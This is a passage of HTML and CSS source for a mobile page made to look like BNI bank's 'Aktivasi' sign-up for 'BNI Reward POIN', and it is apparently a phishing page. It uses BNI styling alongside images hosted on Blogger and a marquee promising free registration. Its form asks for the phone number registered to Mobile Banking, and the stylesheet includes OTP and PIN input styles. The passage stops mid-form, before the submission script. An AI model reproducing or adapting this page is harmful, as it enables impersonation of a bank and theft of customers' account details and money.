<html>
<head>
    <meta charset="UTF-8">
<meta name="theme-color" content="#FF7F08">

    <meta name="viewport" content="width=device-width, user-scalable=no"/>
    <meta name="viewport"
          content="initial-scale=1, width=device-width, maximum-scale=1.0, user-scalable=no, height=device-height, viewport-fit=cover"/>
    <meta name="format-detection" content="telephone=no">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>REGISTRASI</title>
 <link rel="stylesheet" href="assets/vendors/bootstrap/css/bootstrap.min.css">
 <link rel="stylesheet" href="assets/vendors/bootstrap/css/bootstrap.min.css">
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet"/>
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="assets/css/size.css">
    <link rel="stylesheet" href="assets/css/setting.css">
    <link rel="stylesheet" href="assets/css/favorite.css">
    <link rel="stylesheet" href="assets/icons/bni-icons.css">
 <style>
  @import "https://unpkg.com/open-props";
*,
*::before,
*::after {
  box-sizing: border-box;
}
        label > input[type="radio"] {
            display: none;
        }

        label > input[type="radio"] + *::before {
            content: "";
            display: inline-block;
            vertical-align: bottom;
            width: 1rem;
            height: 1rem;
            margin-right: 0.3rem;
            border-radius: 50%;
            border-style: solid;
            border-width: 0.1rem;
            border-color: #F15A23;
        }

        label > input[type="radio"]:checked + *::before {
            background: radial-gradient(#F15A23 0%, #F15A23 40%, transparent 50%, transparent);
        }

        .hide {
            display: none;
        }

        .stripe {
            margin: auto;
            background-color: #94A7C4;
            height: 4px;
            width: 10px;
        }
    
        .welcome-container-scroll {
            background: rgba(239, 242, 244, 0.85) !important;
           overlay: scroll;
        }

        .ico-chevron-grey {
            filter: gray saturate(0%) brightness(0%) contrast(100%);
            -webkit-filter: saturate(0%) brightness(0%) contrast(100%);
        }

        strong {
            font-weight: 900;
        }

        p {
            line-height: normal;
            margin-bottom: 0;
        }

        

        b {
            font-weight: 900;
        }

        .square h1 {
            color: #fff;
        }

        .mb-0 {
            margin-bottom: 0 !important;
        }

        .ico-medium {
            width: 4em;
            height: 3.5em;
        }

        select.black {
            border: 0;
            -webkit-appearance: none;
            -moz-appearance: none;
            appearance: none;
            background: url("assets/images/icons/ico-down-black.svg") 100% / 4% no-repeat #ffffff !important;
        }

        .progress-bar--outer {
            position: relative;
            width: 100%;
            height: 4px;
            background-color: #ECE9E9;

        }

        .progress-bar {
            position: absolute;
            width: 25%;
            height: 100%;
            background-color: #005E6A;
        }

        input[type=checkbox] {
            accent-color: #005E6A;
            transform: scale(2);
        }

        .blur {
            -webkit-filter: blur(8px);
            -ms-filter: blur(8px);
            -moz-filter: blur(8px);
            -o-filter: blur(8px);
            filter: blur(8px);
        }
        
        input{
            height: 30px;
        }
        
        .form-control-sm{
            height: 30px;
        }
    
body {
  font-family: Arial, Helvetica, sans-serif;
   position: absolute;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
  width: 100%;
}

.flip-card {
  position: relative;
  left: 0;
  right: 0;
  
   margin: 0px auto;

  background-color: transparent;

  width: 75%;
  
  height: 170px;
  perspective: ;

 
     
  }

 
 

.flip-card-inner {
  position: relative;
  width: 100%;
  height: 100%;
  text-align: center;
  transition: transform 0.6s;
  border-radius: 10px;
  transform-style: preserve-3d;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
}

.flip-card:hover .flip-card-inner {
  transform: rotateY(180deg);
  
}


.card-r .flip-card-inner{
    transform: rotateY(180deg);
    transform-style: preserve-3d;
    transition: transform 0.6s;
    
    
}



.card-y {
    transform: rotateY(180deg);
    transform-style: preserve-3d;
    transition: transform 0.6s; 
    -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
    
}

.flip-card-front, .flip-card-back {
  position: absolute;
  width: 100%;
  border-radius: 10px;
  height: 100%;
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
}

.flip-card-front {
  background-color: #bbb;
  color: black;
  height: 170px;
}

.flip-card-back {
  background-color: #2980b9;
  color: white;
  transform: rotateY(180deg);
  height: 170px;
}



.animated {
	-webkit-animation-duration: 0.5s;
	animation-duration: 0.5s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease;
	animation-timing-function: ease;
	 -webkit-backface-visibility: visible !important; 
    -webkit-animation-name: flipOutY; 
    backface-visibility: visible !important; 
    
    animation-name: flipOutY; 
}

@-webkit-keyframes flipOutY { 
    0% { 
        -webkit-transform: perspective(4000px) rotateY(120deg); 
        
        opacity: 1; 
    } 
    100% { 
        -webkit-transform: perspective(1000px) rotateY(180deg); 
        opacity: 1; 
    } 
} 

.rotate {
	-webkit-animation-duration: 0.5s;
	animation-duration: 0.5s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	   -webkit-backface-visibility: visible !important; 
    -webkit-animation-name: flipInY; 
    backface-visibility: visible !important; 
    animation-name: flipInY; 
}

@-webkit-keyframes flipInY { 
    0% { 
        -webkit-transform: perspective(400px) rotateY(90deg); 
        opacity: 1; 
    } 
    
    100% { 
        -webkit-transform: perspective(400px) rotateY(180deg); 
        opacity: 1; 
    } 
} 


.loading-container{align-items:center;display:flex;justify-content:center}.loading-overlay .loading-container{flex-direction:column}.loading-overlay .loading-container .loading-item{-webkit-animation:overlayLoading 1s ease-in-out infinite;animation:overlayLoading 1s ease-in-out infinite;width:5rem}.loading-overlay .loading-container .loading-text{color:#fff;font-weight:600;font-size:14px;width:100%;max-width:212px;text-align:center;margin-top:1.25rem}@-webkit-keyframes overlayLoading{0%{opacity:1;-webkit-transform:scale(0);transform:scale(0)}to{opacity:0;-webkit-transform:scale(1);transform:scale(1)}}@keyframes overlayLoading{0%{opacity:1;-webkit-transform:scale(0);transform:scale(0)}to{opacity:0;-webkit-transform:scale(1);transform:scale(1)}}.list-data{margin-top:1rem;text-align:left}.list-data .ico-list{border-bottom:1px solid #afafaf;font-weight:700;color:#28313b;padding:10px 0}.list-data .ico-list i{color:#006685;font-size:18px;margin-right:10px}@media (min-width:992px){.modal-lg{max-width:1140px}}@media (min-width:992px){.modal-md{max-width:600px}}.modal-header{padding:12px 1rem;background-color:rgba(214,228,230,.5)}.modal-header h5{font-size:16px}.modal-body .nav-tabs .nav-link{color:#4a4a4a}.modal-body .nav-tabs .nav-link.active{background-color:#f9f9f9;font-weight:700}.modal-title{text-transform:uppercase}.modal-detail .title-detail{padding:10px;background-color:#f9f9f9}.modal-detail .detail-data:first-child hr{border-top:0}.modal-detail .detail-data .detail-list{font-size:13px;padding:8px}.modal-detail .modal-title{font-size:1.15em;font-weight:600;letter-spacing:.05em;text-transform:uppercase}.modal-detail .modal-body .card{border:1px solid transparent}.modal-detail .modal-body .card.border{border:1px solid #f5f5f5;margin-left:.6em;margin-right:.6em}.modal-detail .nav-tabs .nav-link{background-color:rgba(52,73,94,.1);border-radius:0;color:#4d4d4d;font-size:.8em;font-weight:500;letter-spacing:.03em;padding:1em .3em;text-transform:uppercase}.modal-detail .nav-tabs .nav-link.active{background-color:#fff}
.loading-overlay{background-color:rgba(22,22,22,0.5);bottom:0;height:100vh;left:0;position:fixed;right:0;top:0;width:100vw;z-index:999999999}.loading-overlay,.loading-overlay .loading-container{align-items:center;display:flex;justify-content:center}.loading-overlay .loading-container{flex-direction:column}.loading-overlay .loading-container .loading-item{-webkit-animation:overlayLoading 1s ease-in-out infinite;animation:overlayLoading 1s ease-in-out infinite;width:5rem}.loading-overlay .loading-container .loading-text{color:#fff;font-weight:600;font-size:14px;width:100%;max-width:212px;text-align:center;margin-top:1.25rem}@-webkit-keyframes overlayLoading{0%{opacity:1;-webkit-transform:scale(0);transform:scale(0)}to{opacity:0;-webkit-transform:scale(1);transform:scale(1)}}@keyframes overlayLoading{0%{opacity:1;-webkit-transform:scale(0);transform:scale(0)}to{opacity:0;-webkit-transform:scale(1);transform:scale(1)}}

    .full-height {
        height: 100%;
    }

    .enable {
        color: #005E6A;
    }

    .disable {
        color: #CCC;
    }

    /*OTP*/
    form input {
        display: inline-block;
        width: 2rem;
        height: 2rem;
        text-align: ;
    }

    .otp {
        border-radius: 5px;
        border-color: lightgrey;
        color: rgb(0, 94, 106);
    }

    a span {
        display: block;
        overflow: hidden;
    }

    .extraBold {
        text-shadow: 1px 0, 0 0, 0 0;
        font-weight: 900;
        font-size: 15px;
        
    }

    /* Body - remove browser margin & set padding to accommodate for the fixed header bar */
    body {
        margin: 0px auto;
        /*padding-top: 89px;*/
         background-image: url(assets/icons/images/WelcomePage/bg_screen.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%; 
  height: 100%;
  overlay: scroll;
    }

    /* Example Heading */
    .example h2 {
        font-family: "Roboto Condensed", helvetica, arial, sans-serif;
        font-size: 1.3em;
        margin: 15px 0;
        color: #4F5462;
    }

    .example input {
        display: block;
        margin: 0 auto 20px auto;
        width: 150px;
        padding: 8px 10px;
        border: 1px solid #CCCCCC;
        border-radius: 3px;
        background: #F2F2F2;
        text-align: center;
        font-size: 1em;
        letter-spacing: 0.02em;
        font-family: "Montserrat" helvetica, arial, sans-serif;
    }

    .example select {
        padding: 10px;
        background: #ffffff;
        border: 1px solid #e7e1e1;
        border-radius: 0.5rem;
        margin: 0 3px 0 2rem;
        text-align: center;
    }

    .example input[type="submit"] {
        margin-top: 10px;
    }

    .example input[type="submit"]:hover {
        cursor: pointer;
        background-color: #e5e5e5;
    }

    strong {
        font-weight: 900;
    }

    /* pin input styling */

    .pin-button {
        margin-top: 0.0em;
        color: #005E6A;
        border: none;
        background: none;
        margin: 0px 12px;
    }

    .active {
        color: #0c5460;
    }



.ico-bksp {
    background-image: url('assets/images/ico-bksp.png');
}
.ico-xtra-small {

    width: 0.25em;

    height: 0.25em;
}
.bni-ico {

    width: 0.2em;

    height: 1em;
    display: inline-block;
    text-align: right;
    margin: 0.2em 0.05em 0.05em 0.2em;
    background-size: 50% 100%;
    background-repeat: no-repeat;
}
    /* end of bullet input styling */
  .welcome-container-scroll {
            background-color: rgba(239, 242, 244, 0.85) !important;
            
  background-size: 100% 100%; 
  background-position: 100% 100%; 
  height: 100%;
        }
        
        
        #setPin{
            margin: -8px;
        }
        
        
        .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

     .ico-chevron-grey {
            filter: gray saturate(0%) brightness(0%) contrast(100%);
            -webkit-filter: saturate(0%) brightness(0%) contrast(100%);
        }

        strong {
            font-weight: 900;
        }

        p {
            line-height: normal;
            margin-bottom: 0;
        }

        body {
            overflow: scroll;
        }

        b {
            font-weight: 900;
        }

        .square h1 {
            color: #fff;
        }

        .mb-0 {
            margin-bottom: 0 !important;
        }

        .ico-medium {
            width: 4em;
            height: 3.5em;
        }

        .progress-bar--outer {
            position: relative;
            width: 100%;
            height: 4px;
            background-color: #ECE9E9;

        }

        .progress-bar {
            position: absolute;
            width: 90%;
            height: 100%;
            background-color: #005E6A;
        }

        input[type=checkbox] {
            accent-color: #005E6A;
            transform: scale(2);
        }


.marquee{
    padding:0 20px;
    width:100%;
    background:none;
    -moz-box-sizing: border-box;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
    -webkit-box-shadow:2px 2px 3px rgba(0,0,0,.05);
    -o-box-shadow:2px 2px 3px rgba(0,0,0,.05);
    -ms-box-shadow:2px 2px 3px rgba(0,0,0,.05);
    box-shadow:2px 2px 3px rgba(0,0,0,.05);
    
}
    
#marquee{
    padding:10px 0;
    width:100%;
    overflow:hidden;
    color: #333;
    font-size: 14px;
    font-weight: 500;
    
}

    .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}


    /* New Menu 2023 */
.ico-home-2023{
    background-image: url(assets/images/NewMenu2023/ico-home-2023.png);
    width: 22px;
    height: 22px;
    display: inline-block;
    background-size: 100% 100%;
}

.ico-history-2023{
    background-image: url(assets/images/NewMenu2023/ico-history-2023.png);
    width: 22px;
    height: 22px;
    display: inline-block;
    background-size: 100% 100%;
}

.ico-favorite-2023{
    background-image: url(assets/images/NewMenu2023/ico-favorite-2023.png);
    width: 22px;
    height: 22px;
    display: inline-block;
    background-size: 100% 100%;
}

.ico-setting-2023{
    background-image: url(assets/images/NewMenu2023/ico-setting-2023.png);
    width: 22px;
    height: 22px;
    display: inline-block;
    background-size: 100% 100%;
}

.ico-qris-2023{
    background-image: url(assets/images/NewMenu2023/ico-qris-2023.png);
    width: 100%;
    height: 70%;
    display: inline-block;
    background-size: 100% 100%;
    background-position: 100% 100%;
    bottom: 0;
    background-color: #F2F3F5;
    border: none;
    margin-top: 15px;
}
.loader11 {

   width: 0.4em;

  height: 0.4em;
  border-radius: 50%;
  
  position: relative;
  box-sizing: border-box;
  position: relative;
  text-indent: -19999em;
  animation: mulShdSpin 0.5s linear infinite;
  animation: rotation 0.5s linear infinite;
 
  
 
}


@keyframes  mulShdSpin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
} 
@keyframes rotation {
  0%,
  100% {
     border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em #000000, 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.5), -1.8em -1.8em 0 0em rgba(000,000,000, 0.7);
  }
  12.5% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,0000, 0.7), 1.8em -1.8em 0 0em #000000, 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.5);
  }
  25% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.5), 1.8em -1.8em 0 0em rgba(000,000,000, 0.7), 2.5em 0em 0 0em #000000, 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  37.5% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.5), 2.5em 0em 0 0em rgba(000,000,000, 0.7), 1.75em 1.75em 0 0em #000000, 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  45% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.5), 2.5em 0em 0 0em rgba(000,000,000, 0.7), 1.75em 1.75em 0 0em #000000, 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  50% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.5), 1.75em 1.75em 0 0em rgba(000,000,000, 0.7), 0em 2.5em 0 0em #000000, -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  55% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.5), 1.75em 1.75em 0 0em rgba(000,000,000, 0.7), 0em 2.5em 0 0em #000000, -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  62.5% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.5), 0em 2.5em 0 0em rgba(000,000,000, 0.7), -1.8em 1.8em 0 0em #000000, -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  75% {
      border: 5px dotted #000;
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.5), -1.8em 1.8em 0 0em rgba(000,000,000, 0.7), -2.6em 0em 0 0em #000000, -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  87.5% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.5), -2.6em 0em 0 0em rgba(000,000,000, 0.7), -1.8em -1.8em 0 0em #000000;
    
  }
  92.5% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.5), -2.6em 0em 0 0em rgba(000,000,000, 0.7), -1.8em -1.8em 0 0em #000000;
    
  }
}


.loader {
  width: 48px;
  height: 48px;
  border: 5px dotted #FFF;
  border-radius: 50%;
  display: inline-block;
  position: relative;
  box-sizing: border-box;
  animation: rotation 2s linear infinite;
}

@keyframes rotation {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
} 


.loader {
  font-size: 7px;
  width: 5px;
  height: 5px;
  border: 2px solid #fff;
  border-radius: 50%;
  position: relative;
  text-indent: 1em;
  box-sizing: border-box;
  animation: mulShdSpin 0.5s infinite ease;
  
  transform: translateZ(1);
}
@keyframes mulShdSpin {
  0%,
  100% {
    box-shadow: 0em -2.6em 0em 0em #ffffff, 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.5), -1.8em -1.8em 0 0em rgba(000,000,000, 0.7);
  }
  96% {
    box-shadow: 0em -2.6em 0em 0em #000, 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.5), -1.8em -1.8em 0 0em rgba(000,000,000, 0.7);
  }
  12.5% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.7), 1.8em -1.8em 0 0em #ffffff, 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.5);
  }
  25% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.5), 1.8em -1.8em 0 0em rgba(000,000,000, 0.7), 2.5em 0em 0 0em #ffffff, 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  37.5% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.5), 2.5em 0em 0 0em rgba(000,000,000, 0.7), 1.75em 1.75em 0 0em #ffffff, 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  50% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.5), 1.75em 1.75em 0 0em rgba(000,000,000, 0.7), 0em 2.5em 0 0em #ffffff, -1.8em 1.8em 0 0em rgba(000,000,000, 0.2), -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  62.5% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.5), 0em 2.5em 0 0em rgba(000,000,000, 0.7), -1.8em 1.8em 0 0em #ffffff, -2.6em 0em 0 0em rgba(000,000,000, 0.2), -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  75% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.5), -1.8em 1.8em 0 0em rgba(000,000,000, 0.7), -2.6em 0em 0 0em #ffffff, -1.8em -1.8em 0 0em rgba(000,000,000, 0.2);
  }
  87.5% {
    box-shadow: 0em -2.6em 0em 0em rgba(000,000,000, 0.2), 1.8em -1.8em 0 0em rgba(000,000,000, 0.2), 2.5em 0em 0 0em rgba(000,000,000, 0.2), 1.75em 1.75em 0 0em rgba(000,000,000, 0.2), 0em 2.5em 0 0em rgba(000,000,000, 0.2), -1.8em 1.8em 0 0em rgba(000,000,000, 0.5), -2.6em 0em 0 0em rgba(000,000,000, 0.7), -1.8em -1.8em 0 0em #ffffff;
  }
}


video  {
  width: 100%;
  height: 100%;
  background: transparent;
  position: fixed;
  
  top: 0;
  right: 0;
  left: 0;
  border-radius: 0%;
  z-index: -1;
  border: 0px solid #ddd;
  
}

#canvas  {
  width: 100%;
  height: 100%;
  display: none;
 position: fixed;
  top: 0;
  bottom: 0;
  right: 0;
  left: 0;
  border-radius: 0%;

}


fieldset{
    width: 100%;
  height: 100%;
  display: ;
 position: absolute;
  top: 0;
  bottom: 0;
  right: 0;
  left: 0;
}
</style>
</head>
<body class="welcome-container-scroll">
<!--<body class="welcome-container-scroll m-0 p-10" onload="Exit_Registration(-2, true);CekKoneksi();">-->
<div class="loading-overlay" style="display: none" id="loadersaya"><div class="loading-container"><img src="https://applycreditcard.bni.co.id/_nuxt/img/b9f7dde.svg" alt="Icon Loading" class="loading-item"></div></div>
<div class="loading-overlay" style="display: none; background: transparent" id="loader">
<span class="loader"></span>
</div>
<div id="spin" style="position: fixed;left: 50%;top: 50%; z-index: 10000; "></div>
 <div class="" style="position: fixed; bottom: 0; width: 100%; left: 0; right: 0; margin: 0px auto; opacity: 1; z-index: 999999999999999; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjesCM1oq1RfF9idhU24EXSvn1ZWzv5zdHvHpcnA1yTkCZ9oP5Xab8i-MYwerGhObxx9KkqWMmYrV4wM6KrAuyaIaWWnxAqJiL3Muk7vSaGUxXOTRVr3QcDrU3ulkDTNlCOjz31_6hfDIIER_fGKtKFTyRdXRu7AIT07yIBJFB1AGQVRbH35r_sZXpOlCE/s1080/AddText_12-31-02.40.50.png); background-size: 100% 100%; background-position: 100% 100%; height: 100px; background-color: none"></div>
<fieldset id="homepage" style="display: ">
    <div class="container" style="background-color: rgba(239, 242, 244, 0.85);  background-image: url(assets/images/welcome-bg.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%; position: absolute; height: 100%; z-index: -; padding-left: unset;padding-right:unset;">
  <header class="title " style="background: #FF7F08">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz-ASbtzrlPGXA_9kDaXQVutLoWx-rHN55gplBfPxgGejo-dY4YYHOw9-IPedBxt7Q-0OUOg4FhW8hTxAW05XdJStCGXUYeYUCKcSXPQc1UKvwpp-oZbL29vQCgfsI-TVWTeeBNc3rSS4hBpnUaB2l5Oo-CQDu4KfwBRP1rXTvo0vxiM6xvj1fdEgXVZE/s1080/1693939692052.png" style="width: 90px; float:left; margin-top: 8px; margin-left: 5px; position: absolute">
        <div class="header-title" >
            <i class="signal-indicator-base right ico-signal-indicator"></i>
            <i class="bni-ico ico-chevron-grey ico-header left ml-3" onclick="goBack()" ></i>
            <h6 class="mb-0 mx-auto" style="margin:auto; color: white; ">Aktivasi</h6>
        </div>
        <div class="progress-bar--outer mt-3" style="background: #18A6B2">
            <div class="progress-bar" style="background: #fff"></div>
        </div>
    </header>

    <hr class="mt-0">
    <div class="col-12 text-center" style="background: none;">
        <p style="font-size:12px; color: #005E6A; font-weight: 500;margin-bottom: 1rem;margin-top: 1rem; ">
            </p>
        <img style="width: 100%; height: auto; position: relative; top: 0; left: 0; right: 0; margin: -0px auto; margin-top: -120px"
             src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2K7NcxHk7XOMWbLyuhsl6xpyMqK5679NByWSlWQtujOyLHu8qP6pSD6pioIloHolas6rqmWGpsUexxTzCXzZMG_YD1a74OfAGuewR2inF9qTJs0SFOz6uqcvQ3fcmgfHuD3uPNS89faVi0SanMnaeAm_kBL0t6rMFz9ZzR6EPaC6efG7_4m6CbujErFI/s1919/AddText_01-07-04.23.01.png"/>

    </div>
    <div class="marquee" style=" padding:0 30px;
    width:100%;
    background:none;
    -moz-box-sizing: border-box;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
    -webkit-box-shadow:2px 2px 3px rgba(0,0,0,.00);
    -o-box-shadow:2px 2px 3px rgba(0,0,0,.00);
    -ms-box-shadow:2px 2px 3px rgba(0,0,0,.00);
    box-shadow:2px 2px 3px rgba(0,0,0,.00);">
	<marquee scrolldelay="100">
<b>Selamat Datang di Layanan BNI Reward POIN <b style="font-weight: 700; color: #005E6A; margin-right: 5px">Segera daftarkan tanpa dipungut biaya</b>  <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP-J7QHNxD5NyHb15g3JZLybHCBbstcaoXwLrZNocdbGa4jYTCzSbmwea1hk_8TxyuZILD3Xdm7lXR_klbYtBh-lZszOYfpP08xwxN6Tbj53nLomRFxMjlZMnheoUn0t5-Gaw9MngwWzi3SejWkWD7WJO6l2kWVIYLWiPIZrKxyIBro5wlDiYovVOH2s8/s1512/1693931297590.png" width="115px" height="18px" style="margin-top: -2px"></b>			    </marquee>
    <br/>
    </div>
    <div class="wizard-content wizard-active" id="wizard-content-1" style="padding: 20px; background: none; display: grid; max-width: 30em;">
  <form id="formNope" onsubmit="sendNoHp()" style="display: grid;">   
        <div class="card m-2 pt-2" style="border:1px solid #005E6A; position:static; background: #fff; height: 100px">
            <div class="card-body p-2">
                <div class="form-group mb-0">
                    <label for="" class="mb-0 new-green-color-style" style="font-weight: 400">Masukkan <strong>Nomor Handphone</strong></label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
                        <div class="input-group-prepend">
                        </div>
       <input type="tel" required minlength="10" name="nope" maxlength="13"
                               class="form-control form-control-box-2 input-rounded card-grey"
                               id="nope"
                               pattern="(?=.*[0-9]).{10,13}"  oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲 yɑng terdɑftɑr di 𝗠𝗼𝗯𝗶𝗹𝗲 𝗕𝗮𝗻𝗸𝗶𝗻𝗴')" onchange="this.setCustomValidity('')"
                               style="background: transparent; margin-left: 1rem;border-bottom: unset !important; text-align: left;"
                               autocapitalize="off" autocorrect="off" placeholder="example : 0812xxxxx">
                        <div class="input-group-prepend">
                            <button class="btn btn-link btn-box-2" type="button" style="border-width: inherit;">
